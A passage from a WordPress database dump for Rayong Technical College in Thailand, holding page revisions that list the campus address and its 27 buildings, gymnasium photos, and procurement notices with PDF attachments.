อาคารอิเล็กทรอนิกส์</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">7. อาคารบริหารธุรกิจ</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">8. อาคารปิโตรเคมี</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">9. อาคารโรงอาหาร</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">10. อาคารเรียนเขียนแบบ 2 ชั้น</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">11. อาคารช่างก่อสร้าง</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">12. อาคารตึกอำนวยการ</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">13. อาคาร Fix-it</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">14. อาคารพัสดุ</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">15. อาคารเขียนแบบเทคนิคพื้นฐาน</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">16. อาคารเรียนสามัญ</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">17. อาคารไฟฟ้ากำลัง</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">18. อาคารเทคโนโลยีอุตสาหกรรม</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">19. อาคารช่างยนต์</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">20. อาคารช่างกลโรงงาน</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">21. อาคาร 4 ชั้น (อาคาร 13)</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">22. อาคาร 4 ชั้น (อบจ)</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">23. อาคารโรงยาง</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">24. อาคารเทคนิคพื้นฐาน</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">25. อาคารตึกส้ม</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">26. อาคารการโรงแรม</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">27. อาคารธนาคาร</span></strong></h2>\n \n\n \n<h3><span style=\"color: #800000;\"> </span></h3>\n \n\n \n\n \n\n \n\n ', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-autosave-v1', '', '', '2018-10-02 11:27:45', '2018-10-02 04:27:45', '', 2809, 'http://www.technicrayong.ac.th/2809-autosave-v1/', 0, 'revision', '', 0),
(4046, 3, '2018-10-02 11:19:28', '2018-10-02 04:19:28', '<h2><span style=\"color: #800000;\"><strong>ป้ายวิทยาลัยเทคนิคระยอง</strong></span></h2>\r\n<img class=\"aligncenter wp-image-2821 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg\" alt=\"\" width=\"837\" height=\"287\" />\r\n<h4></h4>\r\n<h2><strong><span style=\"color: #800000;\">ที่ตั้งสถานศึกษา</span></strong></h2>\r\n<h3><strong><span style=\"color: #3366ff;\">เลขที่ 83/13 ถนนตากสินมหาราช ตำบลท่าประดู่ อำเภอเมือง</span></strong></h3>\r\n<h3><strong><span style=\"color: #3366ff;\">จังหวัดระยอง รหัสไปรษณีย์ 21000</span></strong></h3>\r\n<h2><span style=\"color: #800000;\"><strong>เนื้อที่สถานศึกษา</strong></span></h2>\r\n<h3><span style=\"color: #3366ff;\"><strong>76 ไร่ 2 งาน 17 ตารางวา</strong></span></h3>\r\n \r\n\r\n<img class=\"aligncenter size-full wp-image-3474\" src=\"/wp-content/uploads/2018/07/111111.jpg\" alt=\"\" width=\"1534\" height=\"742\" />\r\n<h2><span style=\"color: #800000;\">มีอาคาร</span> <span style=\"color: #3366ff;\">27</span> <span style=\"color: #800000;\">หลัง</span> <span style=\"color: #800000;\">มีห้อง</span> <span style=\"color: #3366ff;\">406</span> <span style=\"color: #800000;\">ห้อง</span> <span style=\"color: #800000;\">ได้แก่</span></h2>\r\n<h2><span style=\"color: #3366ff;\">1. อาคารโรงยิม</span></h2>\r\n<h2><span style=\"color: #3366ff;\">2. อาคารคหกรรม</span></h2>\r\n<h2><span style=\"color: #3366ff;\">3. อาคารการท่องเที่ยว</span></h2>\r\n<h2><span style=\"color: #3366ff;\">4. อาคารสารสนเทศ</span></h2>\r\n<h2><span style=\"color: #3366ff;\">5. อาคารช่างเชื่อมเก่า</span></h2>\r\n<h2><span style=\"color: #3366ff;\">6. อาคารอิเล็กทรอนิกส์</span></h2>\r\n<h2><span style=\"color: #3366ff;\">7. อาคารบริหารธุรกิจ</span></h2>\r\n<h2><span style=\"color: #3366ff;\">8. อาคารปิโตรเคมี</span></h2>\r\n<h2><span style=\"color: #3366ff;\">9. อาคารโรงอาหาร</span></h2>\r\n<h2><span style=\"color: #3366ff;\">10. อาคารเรียนเขียนแบบ 2 ชั้น</span></h2>\r\n<h2><span style=\"color: #3366ff;\">11. อาคารช่างก่อสร้าง</span></h2>\r\n<h2><span style=\"color: #3366ff;\">12. อาคารตึกอำนวยการ</span></h2>\r\n<h2><span style=\"color: #3366ff;\">13. อาคาร Fix-it</span></h2>\r\n<h2><span style=\"color: #3366ff;\">14. อาคารพัสดุ</span></h2>\r\n<h2><span style=\"color: #3366ff;\">15. อาคารเขียนแบบเทคนิคพื้นฐาน</span></h2>\r\n<h2><span style=\"color: #3366ff;\">16. อาคารเรียนสามัญ</span></h2>\r\n<h2><span style=\"color: #3366ff;\">17. อาคารไฟฟ้ากำลัง</span></h2>\r\n<h2><span style=\"color: #3366ff;\">18. อาคารเทคโนโลยีอุตสาหกรรม</span></h2>\r\n<h2><span style=\"color: #3366ff;\">19. อาคารช่างยนต์</span></h2>\r\n<h2><span style=\"color: #3366ff;\">20. อาคารช่างกลโรงงาน</span></h2>\r\n<h2><span style=\"color: #3366ff;\">21. อาคาร 4 ชั้น (อาคาร 13)</span></h2>\r\n<h2><span style=\"color: #3366ff;\">22. อาคาร 4 ชั้น (อบจ)</span></h2>\r\n<h2><span style=\"color: #3366ff;\">23. อาคารโรงยาง</span></h2>\r\n<h2><span style=\"color: #3366ff;\">24. อาคารเทคนิคพื้นฐาน</span></h2>\r\n<h2><span style=\"color: #3366ff;\">25. อาคารตึกส้ม</span></h2>\r\n<h2><span style=\"color: #3366ff;\">26. อาคารการโรงแรม</span></h2>\r\n<h2><span style=\"color: #3366ff;\">27. อาคารธนาคาร</span></h2>\r\n \r\n\r\n \r\n<h3><span style=\"color: #800000;\"> </span></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-10-02 11:19:28', '2018-10-02 04:19:28', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(4047, 3, '2018-10-02 11:20:41', '2018-10-02 04:20:41', '<h2><span style=\"color: #800000;\"><strong>ป้ายวิทยาลัยเทคนิคระยอง</strong></span></h2>\r\n<img class=\"aligncenter wp-image-2821 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg\" alt=\"\" width=\"837\" height=\"287\" />\r\n<h4></h4>\r\n<h2><strong><span style=\"color: #800000;\">ที่ตั้งสถานศึกษา</span></strong></h2>\r\n<h3><strong><span style=\"color: #3366ff;\">เลขที่ 83/13 ถนนตากสินมหาราช ตำบลท่าประดู่ อำเภอเมือง</span></strong></h3>\r\n<h3><strong><span style=\"color: #3366ff;\">จังหวัดระยอง รหัสไปรษณีย์ 21000</span></strong></h3>\r\n<h2><span style=\"color: #800000;\"><strong>เนื้อที่สถานศึกษา</strong></span></h2>\r\n<h3><span style=\"color: #3366ff;\"><strong>76 ไร่ 2 งาน 17 ตารางวา</strong></span></h3>\r\n \r\n\r\n<img class=\"aligncenter size-full wp-image-3474\" src=\"/wp-content/uploads/2018/07/111111.jpg\" alt=\"\" width=\"1534\" height=\"742\" />\r\n<h2><strong><span style=\"color: #800000;\">มีอาคาร</span> <span style=\"color: #3366ff;\">27</span> <span style=\"color: #800000;\">หลัง</span> <span style=\"color: #800000;\">มีห้อง</span> <span style=\"color: #3366ff;\">406</span> <span style=\"color: #800000;\">ห้อง</span> <span style=\"color: #800000;\">ได้แก่</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">1. อาคารโรงยิม</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">2. อาคารคหกรรม</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">3. อาคารการท่องเที่ยว</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">4. อาคารสารสนเทศ</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">5. อาคารช่างเชื่อมเก่า</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">6. อาคารอิเล็กทรอนิกส์</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">7. อาคารบริหารธุรกิจ</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">8. อาคารปิโตรเคมี</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">9. อาคารโรงอาหาร</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">10. อาคารเรียนเขียนแบบ 2 ชั้น</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">11. อาคารช่างก่อสร้าง</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">12. อาคารตึกอำนวยการ</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">13. อาคาร Fix-it</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">14. อาคารพัสดุ</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">15. อาคารเขียนแบบเทคนิคพื้นฐาน</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">16. อาคารเรียนสามัญ</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">17. อาคารไฟฟ้ากำลัง</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">18. อาคารเทคโนโลยีอุตสาหกรรม</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">19. อาคารช่างยนต์</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">20. อาคารช่างกลโรงงาน</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">21. อาคาร 4 ชั้น (อาคาร 13)</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">22. อาคาร 4 ชั้น (อบจ)</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">23. อาคารโรงยาง</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">24. อาคารเทคนิคพื้นฐาน</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">25. อาคารตึกส้ม</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">26. อาคารการโรงแรม</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">27. อาคารธนาคาร</span></strong></h2>\r\n \r\n\r\n \r\n<h3><span style=\"color: #800000;\"> </span></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-10-02 11:20:41', '2018-10-02 04:20:41', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(4048, 3, '2018-10-02 11:56:47', '2018-10-02 04:56:47', '<h2><span style=\"color: #3366ff;\"><strong>บริเวรด้านหน้าอาคาร</strong></span></h2>\r\n<img class=\"wp-image-4108 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1674-300x169.jpg\" alt=\"\" width=\"461\" height=\"260\" /><img class=\"wp-image-4049 alignleft\" src=\"/wp-content/uploads/2018/10/DSC00705-1024x683.jpg\" alt=\"\" width=\"390\" height=\"260\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร ชั้น 1 </strong></span></h2>\r\n<h2><span style=\"color: #3366ff;\"><strong>จำนวน 4 ห้อง</strong></span></h2>\r\n<strong><span style=\"color: #800000;\">1.สนามยิมเนเซียม</span></strong>\r\n\r\n<strong><span style=\"color: #800000;\"><img class=\" wp-image-4122 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1683.jpg\" alt=\"\" width=\"881\" height=\"496\" /></span></strong>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">2.ห้องเกาะแก้ว (สำนักงานองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\" wp-image-4111 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1693.jpg\" alt=\"\" width=\"657\" height=\"370\" /><img class=\"wp-image-4112 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1679.jpg\" alt=\"\" width=\"209\" height=\"371\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">3.ห้องแหลมหญ้า (ห้องประชุมองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\"wp-image-4117 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1675.jpg\" alt=\"\" width=\"655\" height=\"369\" />\r\n\r\n<img class=\" wp-image-4118 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1678.jpg\" alt=\"\" width=\"208\" height=\"369\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">4.ห้องพยาบาล</span></strong>\r\n\r\n<img class=\"wp-image-4120 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1681.jpg\" alt=\"\" width=\"880\" height=\"495\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2></h2>\r\n \r\n<h2></h2>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร ชั้น 2</strong></span></h2>\r\n<h2><span style=\"color: #3366ff;\"><strong>จำนวน 4 ห้อง</strong></span></h2>\r\n<strong><span style=\"color: #800000;\">1.ห้องงานกิจกรรม</span></strong>\r\n\r\n<img class=\" wp-image-4125 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1686.jpg\" alt=\"\" width=\"887\" height=\"499\" />\r\n\r\n \r\n\r\n ', 'อาคารโรงยิม', '', 'publish', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b8%a2%e0%b8%b4%e0%b8%a1', '', '', '2018-10-17 09:41:44', '2018-10-17 02:41:44', '', 0, 'http://www.technicrayong.ac.th/?page_id=4048', 0, 'page', '', 0),
(4049, 3, '2018-10-02 11:54:20', '2018-10-02 04:54:20', '', 'DSC00705', '', 'inherit', 'closed', 'closed', '', 'dsc00705', '', '', '2018-10-02 11:54:20', '2018-10-02 04:54:20', '', 4048, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/DSC00705.jpg', 0, 'attachment', 'image/jpeg', 0),
(4050, 3, '2018-10-02 11:54:33', '2018-10-02 04:54:33', '', 'Picture 163', '', 'inherit', 'closed', 'closed', '', 'picture-163', '', '', '2018-10-02 11:54:33', '2018-10-02 04:54:33', '', 4048, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/Picture-163.jpg', 0, 'attachment', 'image/jpeg', 0),
(4051, 3, '2018-10-02 11:56:47', '2018-10-02 04:56:47', '<h2><span style=\"color: #3366ff;\"><strong>บริเวรด้านหน้าและรอบอาคาร</strong></span></h2>\r\n<img class=\"wp-image-4049 size-large aligncenter\" src=\"/wp-content/uploads/2018/10/DSC00705-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-4050 size-large\" src=\"/wp-content/uploads/2018/10/Picture-163-1024x768.jpg\" alt=\"\" width=\"640\" height=\"480\" />', 'อาคารโรงยิม', '', 'inherit', 'closed', 'closed', '', '4048-revision-v1', '', '', '2018-10-02 11:56:47', '2018-10-02 04:56:47', '', 4048, 'http://www.technicrayong.ac.th/4048-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4053, 3, '2018-10-02 12:55:43', '2018-10-02 05:55:43', '<h2><span style=\"color: #800000;\"><strong>ป้ายวิทยาลัยเทคนิคระยอง</strong></span></h2>\r\n<img class=\"aligncenter wp-image-2821 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg\" alt=\"\" width=\"837\" height=\"287\" />\r\n<h4></h4>\r\n<h2><strong><span style=\"color: #800000;\">ที่ตั้งสถานศึกษา</span></strong></h2>\r\n<h3><strong><span style=\"color: #3366ff;\">เลขที่ 83/13 ถนนตากสินมหาราช ตำบลท่าประดู่ อำเภอเมือง</span></strong></h3>\r\n<h3><strong><span style=\"color: #3366ff;\">จังหวัดระยอง รหัสไปรษณีย์ 21000</span></strong></h3>\r\n<h2><span style=\"color: #800000;\"><strong>เนื้อที่สถานศึกษา</strong></span></h2>\r\n<h3><span style=\"color: #3366ff;\"><strong>76 ไร่ 2 งาน 17 ตารางวา </strong></span></h3>\r\n \r\n\r\n<img class=\"aligncenter size-full wp-image-3474\" src=\"/wp-content/uploads/2018/07/111111.jpg\" alt=\"\" width=\"1534\" height=\"742\" />\r\n<h2><strong><span style=\"color: #800000;\">มีอาคาร</span> <span style=\"color: #3366ff;\">27</span> <span style=\"color: #800000;\">หลัง</span> <span style=\"color: #800000;\">มีห้อง</span> <span style=\"color: #3366ff;\">406</span> <span style=\"color: #800000;\">ห้อง</span> <span style=\"color: #800000;\">ได้แก่</span></strong></h2>\r\n<h2><a href=\"http://www.technicrayong.ac.th/อาคารโรงยิม\"><strong><span style=\"color: #3366ff;\">1. อาคารโรงยิม</span></strong></a></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">2. อาคารคหกรรม</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">3. อาคารการท่องเที่ยว</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">4. อาคารสารสนเทศ</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">5. อาคารช่างเชื่อมเก่า</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">6. อาคารอิเล็กทรอนิกส์</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">7. อาคารบริหารธุรกิจ</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">8. อาคารปิโตรเคมี</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">9. อาคารโรงอาหาร</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">10. อาคารเรียนเขียนแบบ 2 ชั้น</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">11. อาคารช่างก่อสร้าง</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">12. อาคารตึกอำนวยการ</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">13. อาคาร Fix-it</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">14. อาคารพัสดุ</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">15. อาคารเขียนแบบเทคนิคพื้นฐาน</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">16. อาคารเรียนสามัญ</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">17. อาคารไฟฟ้ากำลัง</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">18. อาคารเทคโนโลยีอุตสาหกรรม</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">19. อาคารช่างยนต์</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">20. อาคารช่างกลโรงงาน</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">21. อาคาร 4 ชั้น (อาคาร 13)</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">22. อาคาร 4 ชั้น (อบจ)</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">23. อาคารโรงยาง</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">24. อาคารเทคนิคพื้นฐาน</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">25. อาคารตึกส้ม</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">26. อาคารการโรงแรม</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">27. อาคารธนาคาร</span></strong></h2>\r\n \r\n\r\n \r\n<h3><span style=\"color: #800000;\"> </span></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-10-02 12:55:43', '2018-10-02 05:55:43', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(4054, 3, '2018-10-03 09:33:14', '2018-10-03 02:33:14', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B8%97%E0%B8%94%E0%B8%A5%E0%B8%AD%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%A7%E0%B8%B4%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%B0%E0%B8%AB%E0%B9%8C%E0%B9%84%E0%B8%9F%E0%B8%9F%E0%B9%89%E0%B8%B2%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81%E0%B8%97%E0%B8%A3%E0%B8%AD%E0%B8%99%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C%E0%B8%A2%E0%B8%B2%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์ ประจำปีงบประมาณ พ.ศ. 2562', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b9%80%e0%b8%9c%e0%b8%a2%e0%b9%81%e0%b8%9e%e0%b8%a3%e0%b9%88%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1-4', '', '', '2018-10-03 09:33:14', '2018-10-03 02:33:14', '', 0, 'http://www.technicrayong.ac.th/?p=4054', 283, 'post', '', 0),
(4055, 3, '2018-10-03 09:32:47', '2018-10-03 02:32:47', '', 'ชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์', '', 'inherit', 'closed', 'closed', '', '%e0%b8%8a%e0%b8%b8%e0%b8%94%e0%b8%97%e0%b8%94%e0%b8%a5%e0%b8%ad%e0%b8%87%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b9%80%e0%b8%84%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%a7', '', '', '2018-10-03 09:32:47', '2018-10-03 02:32:47', '', 4054, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/ชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์.pdf', 0, 'attachment', 'application/pdf', 0),
(4056, 3, '2018-10-03 09:33:14', '2018-10-03 02:33:14', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B8%97%E0%B8%94%E0%B8%A5%E0%B8%AD%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%A7%E0%B8%B4%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%B0%E0%B8%AB%E0%B9%8C%E0%B9%84%E0%B8%9F%E0%B8%9F%E0%B9%89%E0%B8%B2%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81%E0%B8%97%E0%B8%A3%E0%B8%AD%E0%B8%99%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C%E0%B8%A2%E0%B8%B2%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์ ประจำปีงบประมาณ พ.ศ. 2562', '', 'inherit', 'closed', 'closed', '', '4054-revision-v1', '', '', '2018-10-03 09:33:14', '2018-10-03 02:33:14', '', 4054, 'http://www.technicrayong.ac.th/4054-revision-v1/', 0, 'revision', '', 0),
(4057, 3, '2018-10-03 09:40:47', '2018-10-03 02:40:47', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%AB%E0%B8%B8%E0%B9%88%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%A3%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%A1%E0%B8%8A%E0%B8%99%E0%B8%B4%E0%B8%94-CMT.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง หุ่นยนต์เชื่อมพร้อมชุดเชื่อมชนิด CMT ประจำปีงบประมาณ พ.ศ. 2562', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b9%80%e0%b8%9c%e0%b8%a2%e0%b9%81%e0%b8%9e%e0%b8%a3%e0%b9%88%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1-5', '', '', '2018-10-03 09:40:47', '2018-10-03 02:40:47', '', 0, 'http://www.technicrayong.ac.th/?p=4057', 282, 'post', '', 0),
(4058, 3, '2018-10-03 09:38:21', '2018-10-03 02:38:21', '', 'หุ่นยนต์เชื่อมพร้อมชุดเชื่อมชนิด CMT', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ab%e0%b8%b8%e0%b9%88%e0%b8%99%e0%b8%a2%e0%b8%99%e0%b8%95%e0%b9%8c%e0%b9%80%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%a1%e0%b8%9e%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%8a%e0%b8%b8%e0%b8%94', '', '', '2018-10-03 09:38:21', '2018-10-03 02:38:21', '', 4057, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/หุ่นยนต์เชื่อมพร้อมชุดเชื่อมชนิด-CMT.pdf', 0, 'attachment', 'application/pdf', 0),
